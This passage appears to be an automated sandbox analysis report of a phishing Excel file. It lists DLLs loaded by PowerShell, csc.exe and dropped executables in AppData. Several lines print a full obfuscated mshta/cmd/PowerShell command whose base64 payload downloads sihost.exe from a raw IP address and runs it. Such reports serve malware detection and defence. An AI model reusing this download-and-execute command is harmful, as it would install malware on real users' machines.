                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: wow64win.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: wow64cpu.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: bcrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: rpcrtremote.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: wow64win.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: wow64cpu.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: bcrypt.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: credssp.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: rpcrtremote.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\sihost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dll
                        Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dll
                        Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dll
                        Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: wow64win.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: wow64cpu.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: bcrypt.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: rpcrtremote.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: wow64win.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: wow64cpu.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: bcrypt.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: credssp.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: rpcrtremote.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.pdbhP source: powershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.pdb source: powershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                        Source: 44330000.0.drInitial sample: OLE indicators vbamacros = False
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxInitial sample: OLE indicators encrypted = True

                        Data Obfuscation

                        barindex
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, v6YiYTTLP0FbJiwAyi.cs.Net Code: LRoIw11c8S System.Reflection.Assembly.Load(byte[])
                        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgI